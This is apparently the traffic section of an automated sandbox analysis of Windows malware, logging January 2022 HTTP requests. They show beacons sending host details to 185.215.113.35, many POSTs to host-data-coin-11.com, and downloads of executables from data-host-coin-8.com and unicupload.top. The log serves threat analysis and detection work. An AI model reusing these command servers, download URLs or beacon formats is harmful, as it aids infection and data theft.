Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----83d53270d11404365da7fce61041da17 | Host: 185.215.113.35 | Content-Length: 83837 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Fri, 14 Jan 2022 09:43:48 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 301056
                            Connection: close
                            Last-Modified: Mon, 10 Jan 2022 12:06:49 GMT
                            ETag: "49800-5d5392be00934"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Fri, 14 Jan 2022 09:43:52 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 322560
                            Connection: close
                            Last-Modified: Fri, 14 Jan 2022 09:43:01 GMT
                            ETag: "4ec00-5d587a0fd00a8"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Fri, 14 Jan 2022 09:44:25 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 905216
                            Connection: close
                            Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT
                            ETag: "dd000-5d578aeb4049d"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Fri, 14 Jan 2022 09:44:31 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 373760
                            Connection: close
                            Last-Modified: Wed, 12 Jan 2022 08:30:43 GMT
                            ETag: "5b400-5d55e62ba577e"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Fri, 14 Jan 2022 09:44:50 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 916735
                            Connection: keep-alive
                            Last-Modified: Fri, 07 Jan 2022 23:09:58 GMT
                            ETag: "61d8c846-dfcff"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Fri, 14 Jan 2022 09:44:55 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 905216
                            Connection: close
                            Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT
                            ETag: "dd000-5d578aeb4049d"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Fri, 14 Jan 2022 09:44:59 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 557664
                            Connection: close
                            Last-Modified: Thu, 13 Jan 2022 19:20:04 GMT
                            ETag: "88260-5d57b92d7ebed"
                            Accept-Ranges: bytes
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://jsplktel.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 281
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://ivfhujym.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 312
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://nipgcts.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 151
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://bxide.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 223
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://rgxie.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 315
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://jnolpkdknj.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 122
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://stbgsgw.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 239
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://uknnqg.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 290
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Host: data-host-coin-8.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://otraxus.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 166
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://qsvubjh.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 279
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://wwmessepf.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 348
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://nlxvu.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 154
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://xjjyulxcfs.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 185
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: GET /install5.exe HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Host: unicupload.top
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://jdecaoxkel.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 252
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://uhcpfe.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 322
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://qwfybhxm.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 176
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://odyvlsasq.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 351
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: GET /game.exe HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Host: data-host-coin-8.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://eahqahqv.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 213
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://daixhajgka.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 248
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://cghrkunn.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 240
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://pfwxavhis.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 275
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: GET /6.php HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Host: 185.7.214.171:8080
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://ebgfrfm.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 130
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://covjb.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 132
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://rguskwyq.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 184
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://vpvxxeoni.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 169
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://arpfh.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 208
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://nnyntvsvo.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 238
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://sopssp.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 334
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://vhclpnkvya.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 267
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://lphbdueqjj.com/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 140
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://kakjdonis.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 184
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://gpnorygxw.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 286
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://ackvfel.net/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 183
                            Host: host-data-coin-11.com
                          Source: global traffic
                          HTTP traffic detected: POST / HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            Referer: http://jrhwfdx.org/
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Content-Length: 194
                            Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrgforv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwivor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wpctxossq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kkrgipwnic.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqlty.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqclrrn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khnjbia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
